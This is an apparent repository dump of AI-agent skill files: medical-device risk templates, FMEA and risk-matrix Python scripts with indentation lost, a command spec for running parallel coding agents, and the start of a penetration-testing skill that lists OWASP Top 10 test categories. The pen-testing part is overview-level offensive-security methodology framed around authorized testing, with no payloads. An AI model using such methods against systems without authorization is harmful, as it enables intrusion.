HAZARD ANALYSIS WORKSHEET
Product: [Device Name]
Document: HA-[Product]-[Rev]
Analyst: [Name]
Date: [Date]
| ID | Hazard | Hazardous Situation | Harm | P | S | Initial Risk | Control | Residual P | Residual S | Final Risk |
|----|--------|---------------------|------|---|---|--------------|---------|------------|------------|------------|
| H-001 | [Hazard] | [Situation] | [Harm] | [1-5] | [1-5] | [Level] | [Control ref] | [1-5] | [1-5] | [Level] |
```
### FMEA Worksheet
```
FMEA WORKSHEET
Product: [Device Name]
Subsystem: [Subsystem]
Analyst: [Name]
Date: [Date]
| ID | Item | Function | Failure Mode | Effect | S | Cause | O | Control | D | RPN | Action |
|----|------|----------|--------------|--------|---|-------|---|---------|---|-----|--------|
| FM-001 | [Item] | [Function] | [Mode] | [Effect] | [1-10] | [Cause] | [1-10] | [Detection] | [1-10] | [S×O×D] | [Action] |
RPN Action Thresholds:
>200: Critical - Immediate action
100-200: High - Action plan required
50-100: Medium - Consider action
<50: Low - Monitor
```
### Risk Management Report Summary
```
RISK MANAGEMENT REPORT
Product: [Device Name]
Date: [Date]
Revision: [X.X]
SUMMARY:
- Total hazards identified: [N]
- Risk controls implemented: [N]
- Residual risks: [N] Low, [N] Medium, [N] High
- Overall conclusion: [Acceptable / Not Acceptable]
RISK DISTRIBUTION:
| Risk Level | Before Control | After Control |
|------------|----------------|---------------|
| Unacceptable | [N] | 0 |
| High | [N] | [N] |
| Medium | [N] | [N] |
| Low | [N] | [N] |
CONTROLS IMPLEMENTED:
- Inherent safety: [N]
- Protective measures: [N]
- Information for safety: [N]
OVERALL RESIDUAL RISK: [Acceptable / ALARP Demonstrated]
BENEFIT-RISK CONCLUSION: [If applicable]
APPROVAL:
Risk Management Lead: _____________ Date: _______
Quality Assurance: _____________ Date: _______
```
---
FILE:scripts/fmea_analyzer.py
#!/usr/bin/env python3
"""
FMEA Analyzer - Failure Mode and Effects Analysis for medical device risk management.
Supports Design FMEA (dFMEA) and Process FMEA (pFMEA) per ISO 14971 and IEC 60812.
Calculates Risk Priority Numbers (RPN), identifies critical items, and generates
risk reduction recommendations.
Usage:
python fmea_analyzer.py --data fmea_input.json
python fmea_analyzer.py --interactive
python fmea_analyzer.py --data fmea_input.json --output json
"""
import argparse
import json
import sys
from dataclasses import dataclass, field, asdict
from typing import List, Dict, Optional, Tuple
from enum import Enum
from datetime import datetime
class FMEAType(Enum):
DESIGN = "Design FMEA"
PROCESS = "Process FMEA"
class Severity(Enum):
INCONSEQUENTIAL = 1
MINOR = 2
MODERATE = 3
SIGNIFICANT = 4
SERIOUS = 5
CRITICAL = 6
SERIOUS_HAZARD = 7
HAZARDOUS = 8
HAZARDOUS_NO_WARNING = 9
CATASTROPHIC = 10
class Occurrence(Enum):
REMOTE = 1
LOW = 2
LOW_MODERATE = 3
MODERATE = 4
MODERATE_HIGH = 5
HIGH = 6
VERY_HIGH = 7
EXTREMELY_HIGH = 8
ALMOST_CERTAIN = 9
INEVITABLE = 10
class Detection(Enum):
ALMOST_CERTAIN = 1
VERY_HIGH = 2
HIGH = 3
MODERATE_HIGH = 4
MODERATE = 5
LOW_MODERATE = 6
LOW = 7
VERY_LOW = 8
REMOTE = 9
ABSOLUTELY_UNCERTAIN = 10
@dataclass
class FMEAEntry:
"""Single FMEA line item."""
item_process: str
function: str
failure_mode: str
effect: str
severity: int
cause: str
occurrence: int
current_controls: str
detection: int
rpn: int = 0
criticality: str = ""
recommended_actions: List[str] = field(default_factory=list)
responsibility: str = ""
target_date: str = ""
actions_taken: str = ""
revised_severity: int = 0
revised_occurrence: int = 0
revised_detection: int = 0
revised_rpn: int = 0
def calculate_rpn(self):
self.rpn = self.severity * self.occurrence * self.detection
if self.severity >= 8:
self.criticality = "CRITICAL"
elif self.rpn >= 200:
self.criticality = "HIGH"
elif self.rpn >= 100:
self.criticality = "MEDIUM"
else:
self.criticality = "LOW"
def calculate_revised_rpn(self):
if self.revised_severity and self.revised_occurrence and self.revised_detection:
self.revised_rpn = self.revised_severity * self.revised_occurrence * self.revised_detection
@dataclass
class FMEAReport:
"""Complete FMEA analysis report."""
fmea_type: str
product_process: str
team: List[str]
date: str
entries: List[FMEAEntry]
summary: Dict
risk_reduction_actions: List[Dict]
class FMEAAnalyzer:
"""Analyzes FMEA data and generates risk assessments."""
# RPN thresholds
RPN_CRITICAL = 200
RPN_HIGH = 100
RPN_MEDIUM = 50
def __init__(self, fmea_type: FMEAType = FMEAType.DESIGN):
self.fmea_type = fmea_type
def analyze_entries(self, entries: List[FMEAEntry]) -> Dict:
"""Analyze all FMEA entries and generate summary."""
for entry in entries:
entry.calculate_rpn()
entry.calculate_revised_rpn()
rpns = [e.rpn for e in entries if e.rpn > 0]
revised_rpns = [e.revised_rpn for e in entries if e.revised_rpn > 0]
critical = [e for e in entries if e.criticality == "CRITICAL"]
high = [e for e in entries if e.criticality == "HIGH"]
medium = [e for e in entries if e.criticality == "MEDIUM"]
# Severity distribution
sev_dist = {}
for e in entries:
sev_range = "1-3 (Low)" if e.severity <= 3 else "4-6 (Medium)" if e.severity <= 6 else "7-10 (High)"
sev_dist[sev_range] = sev_dist.get(sev_range, 0) + 1
summary = {
"total_entries": len(entries),
"rpn_statistics": {
"min": min(rpns) if rpns else 0,
"max": max(rpns) if rpns else 0,
"average": round(sum(rpns) / len(rpns), 1) if rpns else 0,
"median": sorted(rpns)[len(rpns) // 2] if rpns else 0
},
"risk_distribution": {
"critical_severity": len(critical),
"high_rpn": len(high),
"medium_rpn": len(medium),
"low_rpn": len(entries) - len(critical) - len(high) - len(medium)
},
"severity_distribution": sev_dist,
"top_risks": [
{
"item": e.item_process,
"failure_mode": e.failure_mode,
"rpn": e.rpn,
"severity": e.severity
}
for e in sorted(entries, key=lambda x: x.rpn, reverse=True)[:5]
]
}
if revised_rpns:
summary["revised_rpn_statistics"] = {
"min": min(revised_rpns),
"max": max(revised_rpns),
"average": round(sum(revised_rpns) / len(revised_rpns), 1),
"improvement": round((sum(rpns) - sum(revised_rpns)) / sum(rpns) * 100, 1) if rpns else 0
}
return summary
def generate_risk_reduction_actions(self, entries: List[FMEAEntry]) -> List[Dict]:
"""Generate recommended risk reduction actions."""
actions = []
# Sort by RPN descending
sorted_entries = sorted(entries, key=lambda e: e.rpn, reverse=True)
for entry in sorted_entries[:10]: # Top 10 risks
if entry.rpn >= self.RPN_HIGH or entry.severity >= 8:
strategies = []
# Severity reduction strategies (highest priority for high severity)
if entry.severity >= 7:
strategies.append({
"type": "Severity Reduction",
"action": f"Redesign {entry.item_process} to eliminate failure mode: {entry.failure_mode}",
"priority": "Highest",
"expected_impact": "May reduce severity by 2-4 points"
})
# Occurrence reduction strategies
if entry.occurrence >= 5:
strategies.append({
"type": "Occurrence Reduction",
"action": f"Implement preventive controls for cause: {entry.cause}",
"priority": "High",
"expected_impact": f"Target occurrence reduction from {entry.occurrence} to {max(1, entry.occurrence - 3)}"
})
# Detection improvement strategies
if entry.detection >= 5:
strategies.append({
"type": "Detection Improvement",
"action": f"Enhance detection methods: {entry.current_controls}",
"priority": "Medium",
"expected_impact": f"Target detection improvement from {entry.detection} to {max(1, entry.detection - 3)}"
})
actions.append({
"item": entry.item_process,
"failure_mode": entry.failure_mode,
"current_rpn": entry.rpn,
"current_severity": entry.severity,
"strategies": strategies
})
return actions
def create_entry_from_dict(self, data: Dict) -> FMEAEntry:
"""Create FMEA entry from dictionary."""
entry = FMEAEntry(
item_process=data.get("item_process", ""),
function=data.get("function", ""),
failure_mode=data.get("failure_mode", ""),
effect=data.get("effect", ""),
severity=data.get("severity", 1),
cause=data.get("cause", ""),
occurrence=data.get("occurrence", 1),
current_controls=data.get("current_controls", ""),
detection=data.get("detection", 1),
recommended_actions=data.get("recommended_actions", []),
responsibility=data.get("responsibility", ""),
target_date=data.get("target_date", ""),
actions_taken=data.get("actions_taken", ""),
revised_severity=data.get("revised_severity", 0),
revised_occurrence=data.get("revised_occurrence", 0),
revised_detection=data.get("revised_detection", 0)
)
entry.calculate_rpn()
entry.calculate_revised_rpn()
return entry
def generate_report(self, product_process: str, team: List[str], entries_data: List[Dict]) -> FMEAReport:
"""Generate complete FMEA report."""
entries = [self.create_entry_from_dict(e) for e in entries_data]
summary = self.analyze_entries(entries)
actions = self.generate_risk_reduction_actions(entries)
return FMEAReport(
fmea_type=self.fmea_type.value,
product_process=product_process,
team=team,
date=datetime.now().strftime("%Y-%m-%d"),
entries=entries,
summary=summary,
risk_reduction_actions=actions
)
def format_fmea_text(report: FMEAReport) -> str:
"""Format FMEA report as text."""
lines = [
"=" * 80,
f"{report.fmea_type.upper()} REPORT",
"=" * 80,
f"Product/Process: {report.product_process}",
f"Date: {report.date}",
f"Team: {', '.join(report.team)}",
"",
"SUMMARY",
"-" * 60,
f"Total Failure Modes Analyzed: {report.summary['total_entries']}",
f"Critical Severity (≥8): {report.summary['risk_distribution']['critical_severity']}",
f"High RPN (≥100): {report.summary['risk_distribution']['high_rpn']}",
f"Medium RPN (50-99): {report.summary['risk_distribution']['medium_rpn']}",
"",
"RPN Statistics:",
f" Min: {report.summary['rpn_statistics']['min']}",
f" Max: {report.summary['rpn_statistics']['max']}",
f" Average: {report.summary['rpn_statistics']['average']}",
f" Median: {report.summary['rpn_statistics']['median']}",
]
if "revised_rpn_statistics" in report.summary:
lines.extend([
"",
"Revised RPN Statistics:",
f" Average: {report.summary['revised_rpn_statistics']['average']}",
f" Improvement: {report.summary['revised_rpn_statistics']['improvement']}%",
])
lines.extend([
"",
"TOP RISKS",
"-" * 60,
f"{'Item':<25} {'Failure Mode':<30} {'RPN':>5} {'Sev':>4}",
"-" * 66,
])
for risk in report.summary.get("top_risks", []):
lines.append(f"{risk['item'][:24]:<25} {risk['failure_mode'][:29]:<30} {risk['rpn']:>5} {risk['severity']:>4}")
lines.extend([
"",
"FMEA ENTRIES",
"-" * 60,
])
for i, entry in enumerate(report.entries, 1):
marker = "⚠" if entry.criticality in ["CRITICAL", "HIGH"] else "•"
lines.extend([
f"",
f"{marker} Entry {i}: {entry.item_process} - {entry.function}",
f" Failure Mode: {entry.failure_mode}",
f" Effect: {entry.effect}",
f" Cause: {entry.cause}",
f" S={entry.severity} × O={entry.occurrence} × D={entry.detection} = RPN {entry.rpn} [{entry.criticality}]",
f" Current Controls: {entry.current_controls}",
])
if entry.recommended_actions:
lines.append(f" Recommended Actions:")
for action in entry.recommended_actions:
lines.append(f" → {action}")
if entry.revised_rpn > 0:
lines.append(f" Revised: S={entry.revised_severity} × O={entry.revised_occurrence} × D={entry.revised_detection} = RPN {entry.revised_rpn}")
if report.risk_reduction_actions:
lines.extend([
"",
"RISK REDUCTION RECOMMENDATIONS",
"-" * 60,
])
for action in report.risk_reduction_actions:
lines.extend([
f"",
f" {action['item']} - {action['failure_mode']}",
f" Current RPN: {action['current_rpn']} (Severity: {action['current_severity']})",
])
for strategy in action["strategies"]:
lines.append(f" [{strategy['priority']}] {strategy['type']}: {strategy['action']}")
lines.append(f" Expected: {strategy['expected_impact']}")
lines.append("=" * 80)
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(description="FMEA Analyzer for Medical Device Risk Management")
parser.add_argument("--type", choices=["design", "process"], default="design", help="FMEA type")
parser.add_argument("--data", type=str, help="JSON file with FMEA data")
parser.add_argument("--output", choices=["text", "json"], default="text", help="Output format")
parser.add_argument("--interactive", action="store_true", help="Interactive mode")
args = parser.parse_args()
fmea_type = FMEAType.DESIGN if args.type == "design" else FMEAType.PROCESS
analyzer = FMEAAnalyzer(fmea_type)
if args.data:
with open(args.data) as f:
data = json.load(f)
report = analyzer.generate_report(
product_process=data.get("product_process", ""),
team=data.get("team", []),
entries_data=data.get("entries", [])
)
else:
# Demo data
demo_entries = [
{
"item_process": "Battery Module",
"function": "Provide power for 8 hours",
"failure_mode": "Premature battery drain",
"effect": "Device shuts down during procedure",
"severity": 8,
"cause": "Cell degradation due to temperature cycling",
"occurrence": 4,
"current_controls": "Incoming battery testing, temperature spec in IFU",
"detection": 5,
"recommended_actions": ["Add battery health monitoring algorithm", "Implement low-battery warning at 20%"]
},
{
"item_process": "Software Controller",
"function": "Control device operation",
"failure_mode": "Firmware crash",
"effect": "Device becomes unresponsive",
"severity": 7,
"cause": "Memory leak in logging module",
"occurrence": 3,
"current_controls": "Code review, unit testing, integration testing",
"detection": 4,
"recommended_actions": ["Add watchdog timer", "Implement memory usage monitoring"]
},
{
"item_process": "Sterile Packaging",
"function": "Maintain sterility until use",
"failure_mode": "Seal breach",
"effect": "Device contamination",
"severity": 9,
"cause": "Sealing jaw temperature variation",
"occurrence": 2,
"current_controls": "Seal integrity testing (dye penetration), SPC on sealing process",
"detection": 3,
"recommended_actions": ["Add real-time seal temperature monitoring", "Implement 100% seal integrity testing"]
}
]
report = analyzer.generate_report(
product_process="Insulin Pump Model X200",
team=["Quality Engineer", "R&D Lead", "Manufacturing Engineer", "Risk Manager"],
entries_data=demo_entries
)
if args.output == "json":
result = {
"fmea_type": report.fmea_type,
"product_process": report.product_process,
"date": report.date,
"team": report.team,
"entries": [asdict(e) for e in report.entries],
"summary": report.summary,
"risk_reduction_actions": report.risk_reduction_actions
}
print(json.dumps(result, indent=2))
else:
print(format_fmea_text(report))
if __name__ == "__main__":
main()
FILE:scripts/risk_matrix_calculator.py
#!/usr/bin/env python3
"""
Risk Matrix Calculator
Calculate risk levels based on probability and severity ratings per ISO 14971.
Supports multiple risk matrix configurations and FMEA RPN calculations.
Usage:
python risk_matrix_calculator.py --probability 3 --severity 4
python risk_matrix_calculator.py --fmea --severity 8 --occurrence 5 --detection 6
python risk_matrix_calculator.py --interactive
python risk_matrix_calculator.py --list-criteria
"""
import argparse
import json
import sys
from typing import Tuple, Optional
# Standard 5x5 Risk Matrix per ISO 14971 common practice
PROBABILITY_LEVELS = {
1: {"name": "Improbable", "description": "Very unlikely to occur", "frequency": "<10^-6"},
2: {"name": "Remote", "description": "Unlikely to occur", "frequency": "10^-5 to 10^-6"},
3: {"name": "Occasional", "description": "May occur", "frequency": "10^-4 to 10^-5"},
4: {"name": "Probable", "description": "Likely to occur", "frequency": "10^-3 to 10^-4"},
5: {"name": "Frequent", "description": "Expected to occur", "frequency": ">10^-3"}
}
SEVERITY_LEVELS = {
1: {"name": "Negligible", "description": "Inconvenience or temporary discomfort", "harm": "No injury"},
2: {"name": "Minor", "description": "Temporary injury not requiring intervention", "harm": "Temporary discomfort"},
3: {"name": "Serious", "description": "Injury requiring professional intervention", "harm": "Reversible injury"},
4: {"name": "Critical", "description": "Permanent impairment or life-threatening", "harm": "Permanent impairment"},
5: {"name": "Catastrophic", "description": "Death", "harm": "Death"}
}
# Risk matrix: RISK_MATRIX[probability][severity] = risk_level
RISK_MATRIX = {
1: {1: "Low", 2: "Low", 3: "Low", 4: "Medium", 5: "Medium"},
2: {1: "Low", 2: "Low", 3: "Medium", 4: "Medium", 5: "High"},
3: {1: "Low", 2: "Medium", 3: "Medium", 4: "High", 5: "High"},
4: {1: "Medium", 2: "Medium", 3: "High", 4: "High", 5: "Unacceptable"},
5: {1: "Medium", 2: "High", 3: "High", 4: "Unacceptable", 5: "Unacceptable"}
}
# Risk level definitions and required actions
RISK_ACTIONS = {
"Low": {
"acceptable": True,
"action": "Document and accept. No further action required.",
"color": "green"
},
"Medium": {
"acceptable": "ALARP",
"action": "Reduce risk if practicable. Document ALARP rationale if not reduced.",
"color": "yellow"
},
"High": {
"acceptable": "ALARP",
"action": "Risk reduction required. Must demonstrate ALARP if residual risk remains high.",
"color": "orange"
},
"Unacceptable": {
"acceptable": False,
"action": "Risk reduction mandatory. Design change required before proceeding.",
"color": "red"
}
}
# FMEA scales (1-10)
FMEA_SEVERITY = {
1: "No effect",
2: "Very minor effect",
3: "Minor effect",
4: "Very low effect",
5: "Low effect",
6: "Moderate effect",
7: "High effect",
8: "Very high effect",
9: "Hazardous with warning",
10: "Hazardous without warning"
}
FMEA_OCCURRENCE = {
1: "Remote (<1 in 1,500,000)",
2: "Very low (1 in 150,000)",
3: "Low (1 in 15,000)",
4: "Moderately low (1 in 2,000)",
5: "Moderate (1 in 400)",
6: "Moderately high (1 in 80)",
7: "High (1 in 20)",
8: "Very high (1 in 8)",
9: "Extremely high (1 in 3)",
10: "Almost certain (>1 in 2)"
}
FMEA_DETECTION = {
1: "Almost certain detection",
2: "Very high detection",
3: "High detection",
4: "Moderately high detection",
5: "Moderate detection",
6: "Low detection",
7: "Very low detection",
8: "Remote detection",
9: "Very remote detection",
10: "Cannot detect"
}
def calculate_risk_level(probability: int, severity: int) -> dict:
"""Calculate risk level from probability and severity ratings."""
if probability < 1 or probability > 5:
return {"error": f"Probability must be 1-5, got {probability}"}
if severity < 1 or severity > 5:
return {"error": f"Severity must be 1-5, got {severity}"}
risk_level = RISK_MATRIX[probability][severity]
risk_info = RISK_ACTIONS[risk_level]
return {
"probability": {
"rating": probability,
**PROBABILITY_LEVELS[probability]
},
"severity": {
"rating": severity,
**SEVERITY_LEVELS[severity]
},
"risk_level": risk_level,
"acceptable": risk_info["acceptable"],
"action_required": risk_info["action"],
"risk_index": probability * severity
}
def calculate_rpn(severity: int, occurrence: int, detection: int) -> dict:
"""Calculate FMEA Risk Priority Number."""
if not all(1 <= x <= 10 for x in [severity, occurrence, detection]):
return {"error": "All FMEA ratings must be 1-10"}
rpn = severity * occurrence * detection
# Determine priority level
if rpn > 200:
priority = "Critical"
action = "Immediate action required"
elif rpn > 100:
priority = "High"
action = "Action plan required"
elif rpn > 50:
priority = "Medium"
action = "Consider risk reduction"
else:
priority = "Low"
action = "Monitor"
return {
"severity": {
"rating": severity,
"description": FMEA_SEVERITY[severity]
},
"occurrence": {
"rating": occurrence,
"description": FMEA_OCCURRENCE[occurrence]
},
"detection": {
"rating": detection,
"description": FMEA_DETECTION[detection]
},
"rpn": rpn,
"priority": priority,
"action_required": action,
"max_rpn": 1000,
"rpn_percentage": round(rpn / 10, 1)
}
def display_risk_matrix():
"""Display the full risk matrix."""
print("\n" + "=" * 70)
print("ISO 14971 RISK MATRIX (5x5)")
print("=" * 70)
# Header
print("\n" + " " * 15, end="")
for s in range(1, 6):
print(f"S{s:^10}", end="")
print()
print(" " * 15, end="")
for s in range(1, 6):
print(f"{SEVERITY_LEVELS[s]['name'][:10]:^10}", end="")
print()
print("-" * 70)
# Matrix rows
for p in range(5, 0, -1):
print(f"P{p} {PROBABILITY_LEVELS[p]['name'][:10]:>10} |", end="")
for s in range(1, 6):
level = RISK_MATRIX[p][s]
print(f"{level:^10}", end="")
print()
print("\n" + "-" * 70)
print("Risk Levels: Low (Acceptable) | Medium (ALARP) | High (ALARP) | Unacceptable")
print("=" * 70)
def display_criteria():
"""Display probability and severity criteria."""
print("\n" + "=" * 70)
print("PROBABILITY CRITERIA")
print("=" * 70)
for level, info in PROBABILITY_LEVELS.items():
print(f"\nP{level}: {info['name']}")
print(f" Description: {info['description']}")
print(f" Frequency: {info['frequency']}")
print("\n" + "=" * 70)
print("SEVERITY CRITERIA")
print("=" * 70)
for level, info in SEVERITY_LEVELS.items():
print(f"\nS{level}: {info['name']}")
print(f" Description: {info['description']}")
print(f" Harm: {info['harm']}")
print("\n" + "=" * 70)
print("RISK LEVEL ACTIONS")
print("=" * 70)
for level, info in RISK_ACTIONS.items():
acceptable = "Yes" if info['acceptable'] == True else ("ALARP" if info['acceptable'] == "ALARP" else "No")
print(f"\n{level}:")
print(f" Acceptable: {acceptable}")
print(f" Action: {info['action']}")
def format_result_text(result: dict, analysis_type: str) -> str:
"""Format result for text output."""
lines = []
lines.append("\n" + "=" * 50)
if analysis_type == "risk":
lines.append("RISK ASSESSMENT RESULT")
lines.append("=" * 50)
lines.append(f"\nProbability: P{result['probability']['rating']} - {result['probability']['name']}")
lines.append(f" {result['probability']['description']}")
lines.append(f"\nSeverity: S{result['severity']['rating']} - {result['severity']['name']}")
lines.append(f" {result['severity']['description']}")
lines.append(f"\n{'-' * 50}")
lines.append(f"RISK LEVEL: {result['risk_level']}")
lines.append(f"Risk Index: {result['risk_index']} (P × S)")
lines.append(f"Acceptable: {result['acceptable']}")
lines.append(f"\nAction Required:")
lines.append(f" {result['action_required']}")
elif analysis_type == "fmea":
lines.append("FMEA RPN CALCULATION")
lines.append("=" * 50)
lines.append(f"\nSeverity: {result['severity']['rating']}/10")
lines.append(f" {result['severity']['description']}")
lines.append(f"\nOccurrence: {result['occurrence']['rating']}/10")
lines.append(f" {result['occurrence']['description']}")
lines.append(f"\nDetection: {result['detection']['rating']}/10")
lines.append(f" {result['detection']['description']}")
lines.append(f"\n{'-' * 50}")
lines.append(f"RPN: {result['rpn']} / {result['max_rpn']} ({result['rpn_percentage']}%)")
lines.append(f"Priority: {result['priority']}")
lines.append(f"\nAction Required:")
lines.append(f" {result['action_required']}")
lines.append("=" * 50)
return "\n".join(lines)
def interactive_mode():
"""Run interactive risk assessment."""
print("\n" + "=" * 50)
print("RISK MATRIX CALCULATOR - Interactive Mode")
print("=" * 50)
print("\nSelect analysis type:")
print("1. Risk Matrix (ISO 14971 style)")
print("2. FMEA RPN Calculation")
print("3. Display Risk Matrix")
print("4. Display Criteria")
print("5. Exit")
choice = input("\nEnter choice (1-5): ").strip()
if choice == "1":
display_criteria()
print("\n" + "-" * 50)
try:
p = int(input("Enter Probability (1-5): "))
s = int(input("Enter Severity (1-5): "))
result = calculate_risk_level(p, s)
if "error" in result:
print(f"\nError: {result['error']}")
else:
print(format_result_text(result, "risk"))
except ValueError:
print("Invalid input. Please enter numbers.")
elif choice == "2":
print("\nFMEA Scales:")
print(" Severity: 1 (No effect) to 10 (Hazardous without warning)")
print(" Occurrence: 1 (Remote) to 10 (Almost certain)")
print(" Detection: 1 (Almost certain) to 10 (Cannot detect)")
print("-" * 50)
try:
s = int(input("Enter Severity (1-10): "))
o = int(input("Enter Occurrence (1-10): "))
d = int(input("Enter Detection (1-10): "))
result = calculate_rpn(s, o, d)
if "error" in result:
print(f"\nError: {result['error']}")
else:
print(format_result_text(result, "fmea"))
except ValueError:
print("Invalid input. Please enter numbers.")
elif choice == "3":
display_risk_matrix()
elif choice == "4":
display_criteria()
elif choice == "5":
print("Exiting.")
return
else:
print("Invalid choice.")
def main():
parser = argparse.ArgumentParser(
description="Calculate risk levels per ISO 14971 or FMEA RPN",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# ISO 14971 risk matrix calculation
python risk_matrix_calculator.py --probability 3 --severity 4
# FMEA RPN calculation
python risk_matrix_calculator.py --fmea --severity 8 --occurrence 5 --detection 6
# Interactive mode
python risk_matrix_calculator.py --interactive
# Display risk matrix
python risk_matrix_calculator.py --show-matrix
# Display criteria definitions
python risk_matrix_calculator.py --list-criteria
# JSON output
python risk_matrix_calculator.py -p 4 -s 3 --output json
"""
)
parser.add_argument("-p", "--probability", type=int, help="Probability rating (1-5)")
parser.add_argument("-s", "--severity", type=int, help="Severity rating (1-5 for risk, 1-10 for FMEA)")
parser.add_argument("-o", "--occurrence", type=int, help="FMEA occurrence rating (1-10)")
parser.add_argument("-d", "--detection", type=int, help="FMEA detection rating (1-10)")
parser.add_argument("--fmea", action="store_true", help="Use FMEA RPN calculation")
parser.add_argument("--output", choices=["text", "json"], default="text", help="Output format")
parser.add_argument("--show-matrix", action="store_true", help="Display risk matrix")
parser.add_argument("--list-criteria", action="store_true", help="Display probability and severity criteria")
parser.add_argument("--interactive", action="store_true", help="Run in interactive mode")
args = parser.parse_args()
if args.interactive:
interactive_mode()
return
if args.show_matrix:
display_risk_matrix()
return
if args.list_criteria:
display_criteria()
return
if args.fmea:
if not all([args.severity, args.occurrence, args.detection]):
parser.error("FMEA requires --severity, --occurrence, and --detection")
result = calculate_rpn(args.severity, args.occurrence, args.detection)
if "error" in result:
print(f"Error: {result['error']}")
sys.exit(1)
if args.output == "json":
print(json.dumps(result, indent=2))
else:
print(format_result_text(result, "fmea"))
else:
if not all([args.probability, args.severity]):
parser.error("Risk calculation requires --probability and --severity")
result = calculate_risk_level(args.probability, args.severity)
if "error" in result:
print(f"Error: {result['error']}")
sys.exit(1)
if args.output == "json":
print(json.dumps(result, indent=2))
else:
print(format_result_text(result, "risk"))
if __name__ == "__main__":
main()
Lệnh một bước nối chuỗi khởi tạo, baseline, spawn, đánh giá và hợp nhất trong một lần gọi.
---
name: "run"
description: "One-shot lifecycle command that chains init → baseline → spawn → eval → merge in a single invocation."
command: /hub:run
---
# /hub:run — One-Shot Lifecycle
Run the full AgentHub lifecycle in one command: initialize, capture baseline, spawn agents, evaluate results, and merge the winner.
## Usage
```
/hub:run --task "Reduce p50 latency" --agents 3 \
--eval "pytest bench.py --json" --metric p50_ms --direction lower \
--template optimizer
/hub:run --task "Refactor auth module" --agents 2 --template refactorer
/hub:run --task "Cover untested utils" --agents 3 \
--eval "pytest --cov=utils --cov-report=json" --metric coverage_pct --direction higher \
--template test-writer
/hub:run --task "Write 3 email subject lines for spring sale campaign" --agents 3 --judge
```
## Parameters
| Parameter | Required | Description |
|-----------|----------|-------------|
| `--task` | Yes | Task description for agents |
| `--agents` | No | Number of parallel agents (default: 3) |
| `--eval` | No | Eval command to measure results (skip for LLM judge mode) |
| `--metric` | No | Metric name to extract from eval output (required if `--eval` given) |
| `--direction` | No | `lower` or `higher` — which direction is better (required if `--metric` given) |
| `--template` | No | Agent template: `optimizer`, `refactorer`, `test-writer`, `bug-fixer` |
## What It Does
Execute these steps sequentially:
### Step 1: Initialize
Run `/hub:init` with the provided arguments:
```bash
python {skill_path}/scripts/hub_init.py \
--task "{task}" --agents {N} \
[--eval "{eval_cmd}"] [--metric {metric}] [--direction {direction}]
```
Display the session ID to the user.
### Step 2: Capture Baseline
If `--eval` was provided:
1. Run the eval command in the current working directory
2. Extract the metric value from stdout
3. Display: `Baseline captured: {metric} = {value}`
4. Append `baseline: {value}` to `.agenthub/sessions/{session-id}/config.yaml`
If no `--eval` was provided, skip this step.
### Step 3: Spawn Agents
Run `/hub:spawn` with the session ID.
If `--template` was provided, use the template dispatch prompt from `references/agent-templates.md` instead of the default dispatch prompt. Pass the eval command, metric, and baseline to the template variables.
Launch all agents in a single message with multiple Agent tool calls (true parallelism).
### Step 4: Wait and Monitor
After spawning, inform the user that agents are running. When all agents complete (Agent tool returns results):
1. Display a brief summary of each agent's work
2. Proceed to evaluation
### Step 5: Evaluate
Run `/hub:eval` with the session ID:
- If `--eval` was provided: metric-based ranking with `result_ranker.py`
- If no `--eval`: LLM judge mode (coordinator reads diffs and ranks)
If baseline was captured, pass `--baseline {value}` to `result_ranker.py` so deltas are shown.
Display the ranked results table.
### Step 6: Confirm and Merge
Present the results to the user and ask for confirmation:
```
Agent-2 is the winner (128ms, -52ms from baseline).
Merge agent-2's branch? [Y/n]
```
If confirmed, run `/hub:merge`. If declined, inform the user they can:
- `/hub:merge --agent agent-{N}` to pick a different winner
- `/hub:eval --judge` to re-evaluate with LLM judge
- Inspect branches manually
## Critical Rules
- **Sequential execution** — each step depends on the previous
- **Stop on failure** — if any step fails, report the error and stop
- **User confirms merge** — never auto-merge without asking
- **Template is optional** — without `--template`, agents use the default dispatch prompt from `/hub:spawn`
Thực hiện audit bảo mật, pen test, quét lỗ hổng, kiểm tra OWASP Top 10, phát hiện secret và lập báo cáo pen test.
---
name: "security-pen-testing"
description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security assessments. Covers static analysis, dependency scanning, secret detection, API security testing, and pen test report generation."
---
# Security Penetration Testing
Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.
---
## Table of Contents
- [Overview](#overview)
- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
- [Static Analysis](#static-analysis)
- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
- [Secret Scanning](#secret-scanning)
- [API Security Testing](#api-security-testing)
- [Web Vulnerability Testing](#web-vulnerability-testing)
- [Infrastructure Security](#infrastructure-security)
- [Pen Test Report Generation](#pen-test-report-generation)
- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
- [Workflows](#workflows)
- [Anti-Patterns](#anti-patterns)
- [Cross-References](#cross-references)
---
## Overview
### What This Skill Does
This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.
### Distinction from Other Security Skills
| Skill | Focus | Approach |
|-------|-------|----------|
| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
| senior-security | Security policy | Governance — policies, frameworks, risk registers |
| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |
### Prerequisites
All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.
---
## OWASP Top 10 Systematic Audit
Use the vulnerability scanner tool for automated checklist generation:
```bash
# Generate OWASP checklist for a web application
python scripts/vulnerability_scanner.py --target web --scope full
# Quick API-focused scan
python scripts/vulnerability_scanner.py --target api --scope quick --json
```
### Quick Reference
| # | Category | Key Tests |
|---|----------|-----------|
| A01 | Broken Access Control | IDOR, vertical escalation, CORS, JWT claim manipulation, forced browsing |
| A02 | Cryptographic Failures | TLS version, password hashing, hardcoded keys, weak PRNG |
| A03 | Injection | SQLi, NoSQLi, command injection, template injection, XSS |
| A04 | Insecure Design | Rate limiting, business logic abuse, multi-step flow bypass |
| A05 | Security Misconfiguration | Default credentials, debug mode, security headers, directory listing |
| A06 | Vulnerable Components | Dependency audit (npm/pip/go), EOL checks, known CVEs |
